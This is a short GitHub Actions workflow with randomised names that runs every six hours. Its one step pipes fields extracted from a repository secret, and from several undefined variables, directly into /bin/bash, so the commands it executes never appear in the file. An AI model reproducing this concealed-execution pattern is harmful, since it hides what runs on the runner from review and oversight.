name: zhaonaiji1029

on:
  workflow_dispatch:
  schedule:
    - cron: '46 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhaonaiji1029
        env:
          ewwk65999: ${{ secrets.ewwk65999 }}
        run: |
          echo $ewwk65999 | jq -r .ar53 | /bin/bash
          echo $t69 | jq -r .sho48426 | /bin/bash
          echo $b116 | jq -r .aasxu2 | /bin/bash
          echo $hrkz921 | jq -r .frm9 | /bin/bash
          echo $dkn7 | jq -r .fmntv94 | /bin/bash

